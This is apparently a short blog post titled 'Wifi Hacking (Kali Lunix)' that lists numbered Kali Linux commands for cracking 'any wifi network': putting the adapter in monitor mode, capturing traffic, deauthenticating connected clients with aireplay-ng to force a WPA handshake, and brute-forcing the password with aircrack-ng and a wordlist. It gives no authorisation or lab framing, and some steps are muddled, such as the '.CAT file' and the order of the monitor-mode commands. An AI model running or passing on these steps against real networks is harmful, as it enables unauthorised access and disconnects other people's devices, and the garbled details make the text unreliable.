Wifi Hacking (Kali Lunix)




💥WIFI HACKING TUTORIAL 💥


▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️

Here's step by step procedure for kali linux, linux etc. users only!!!

>>>> go to terminal and use following steps to crack any wifi network...

step 1) airmon-ng

step 2) airmon-ng start wlan0

[<<< "wlan0" is my wifi adapter name check yours >>>]

step 3) airmon-ng stop wlan0

step 4) airmon-ng check kill

step 5) airodump-ng wlan0mon

[<<< "wlan0mon" it is the change in wifi adapter name because of monitor mode of adapter >>>]

step 6) [wait 1-2 min ] press ctrl+c to stop the process

step 7) airodump-ng -w [ESSID of network for saving .CAT file] -c [channel network of wifi network] --bssid [target's mac address] wlan0mon

step 8) [see the stations connected to network] open another terminal

step 9) [try to get handshake] aireplay-ng --deauth 10 -a [target's mac address] -c [station bssid] wlan0mon

[[<<<< you will found handshake in the right corner!!! >>>> ]]

step 10) [now try cracking password] use .cap file which is located in "Home"


Last code--->> aircrack-ng -w /usr/share/nmap/nselib/data/passwords.lst -b [target's mac address] /root/Desktop/[your .cap file name].cap

Comments

Popular posts from this blog

2000 Deep Web Links

Educational Sities and More

iPhone's Passcode can be Bypassed Through Brute-Force Attack without Erasing Data